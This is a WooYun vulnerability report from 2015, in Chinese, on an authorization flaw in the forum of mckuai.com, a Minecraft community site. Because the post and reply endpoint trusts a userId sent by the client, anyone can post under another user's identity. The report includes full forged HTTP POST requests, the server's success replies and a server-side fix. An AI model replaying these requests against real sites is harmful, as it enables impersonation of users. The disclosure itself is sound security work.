漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0105004
漏洞标题:麦块任意用户发帖回复
相关厂商:麦块
漏洞作者: 干脆面
提交时间:2015-04-01 18:39
修复时间:2015-05-16 18:40
公开时间:2015-05-16 18:40
漏洞类型:未授权访问/权限绕过
危害等级:低
自评Rank:3
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
发帖,回复的水平权限问题。
详细说明:
发帖,回复时没有对操作员进行验证,可以伪造身份进行发帖回复。
漏洞证明:
1.构造帖子回复的请求
POST http://www.mckuai.com/groupTalk.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.mckuai.com/thread-177809.html
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mckuai.com
Content-Length: 763
Connection: Keep-Alive
Pragma: no-cache
Cookie: mcUserKeyCookieSave=xxx; JSESSIONID=xxx
act=addFollow&userId=106801&operUserId=5140&isNew=1&editTalkId=&forumId=1&forumName=矿工茶馆&talkId=177809&content=%253Cp%253E%25E5%259C%25B0%25E5%259D%2580%25E5%2590%258E%2520%25E8%25B7%259F%25E4%25B8%25AA%25E7%25A9%25BA%25E6%25A0%25BC%2520%25E5%25B0%25B1%25E6%2598%25AF%25E8%25BF%259E%25E6%258E%25A5%253C%252Fp%253E%253Cp%253E%253C%252Fp%253E&talkTitle=%25E5%2588%25B0%25E7%258E%25B0%25E5%259C%25A8%25E6%2588%2591%25E9%2583%25BD%25E4%25B8%258D%25E7%259F%25A5%25E9%2581%2593%25E6%2580%258E%25E4%25B9%2588%25E5%258F%2591%25E9%2593%25BE%25E6%258E%25A5%25E5%2592%258C%25E8%25A7%2586%25E9%25A2%2591%25EF%25BC%258C%25E6%25B1%2582%25E5%25A4%25A7%25E5%25A4%25A7%25E4%25BB%25AC%25E7%259B%25B8%25E5%258A%25A9%25E5%2595%258A%25EF%25BC%2581%25EF%25BC%2581&authCode=ZZS0
2.手工修改 userId 和 authCode,重发请求,就可以任意身份发帖。
(1)userId=106801
(2)userId=106802
(3)userId=106803
3.返回
HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Tue, 31 Mar 2015 06:54:48 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
X-Hop-By: uni-ly-dl-se1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Vary: Accept-Encoding
X-Powered-By-Anquanbao: MISS from uni-zz-dl-sg2
Content-Length: 8
跟帖成功
4. 构造发帖请求
POST http://www.mckuai.com/groupTalk.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.mckuai.com/forum-1.html
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mckuai.com
Content-Length: 160
Connection: Keep-Alive
Pragma: no-cache
Cookie: mcUserKeyCookieSave=xxx; JSESSIONID=xxxx
act=addTalk&userId=106803&forumId=1&talkType=%25E9%2597%25B2%25E8%2581%258A&talkTitle=freshman&content=%253Cp%253Ehi%252C%2520helloword%253C%252Fp%253E&endTime=
5.返回
HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Tue, 31 Mar 2015 07:00:47 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
X-Hop-By: uni-ly-dl-se1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Vary: Accept-Encoding
X-Powered-By-Anquanbao: MISS from uni-zz-dl-sg2
Content-Length: 8
发帖成功
修复方案:
userid 保存在服务器端,发帖,回复时直接取服务器的数据。
版权声明:转载请注明来源 干脆面@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝